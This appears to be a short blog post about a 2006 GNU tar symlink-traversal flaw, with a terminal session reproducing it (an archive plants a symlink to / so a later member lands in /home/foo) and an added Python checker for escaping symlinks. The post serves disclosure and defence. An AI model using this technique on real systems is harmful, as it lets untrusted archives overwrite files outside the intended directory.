tar exploit in the wild

Just when you thought you were safe...

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html

Have tested this and it works as described:

nathan@holly /tmp $ tar --version
tar (GNU tar) 1.15.1
nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar
nathan@holly /tmp $ mkdir -p xyz/home/foo
nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt
nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo
nathan@holly /tmp $ rootdo mkdir /home/foo
nathan@holly /tmp $ rootdo chown nathan /home/foo
nathan@holly /tmp $ rm -rf xyz
nathan@holly /tmp $ tar -xf foo.tar
nathan@holly /tmp $ ls -l xyz
lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> /
nathan@holly /tmp $ cat /home/foo/hello.txt
Hello
nathan@holly /tmp $
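
A check for the condition the listing above ends in (a symlink inside the extraction directory that sends later archive members outside it), as an added example that is not part of the original post. The function name `first_escaping_symlink` and the sample layout are constructed for illustration.

```python
import os
import tempfile


def first_escaping_symlink(dest, member_name):
    """Return the first component of member_name that, under dest, is a
    symlink resolving outside dest (or ".." itself); None if the path stays inside."""
    dest_real = os.path.realpath(dest)
    current = dest_real
    for part in member_name.split("/"):
        if part in ("", "."):
            continue  # leading "/" and "." components are ignored
        if part == "..":
            return part  # conservatively treat parent references as escaping
        current = os.path.join(current, part)
        if os.path.islink(current):
            target = os.path.realpath(current)
            if os.path.commonpath([dest_real, target]) != dest_real:
                return os.path.relpath(current, dest_real)
            current = target  # link stays inside dest: keep walking from its target
        elif not os.path.lexists(current):
            break  # nothing on disk yet, so nothing further to follow
    return None


def demo():
    # Constructed layout mirroring the listing: "xyz" is a symlink to "/".
    with tempfile.TemporaryDirectory() as dest:
        os.symlink("/", os.path.join(dest, "xyz"))
        os.makedirs(os.path.join(dest, "safe"))
        members = ["xyz/home/foo/hello.txt", "safe/hello.txt"]
        return {m: first_escaping_symlink(dest, m) for m in members}


if __name__ == "__main__":
    for name, link in demo().items():
        verdict = "escapes via " + link if link else "stays inside"
        print(name, "->", verdict)
```

Run it against a scratch directory where an untrusted archive was unpacked, passing each member name from `tar -tf`; any non-None result means that member would be written outside the directory.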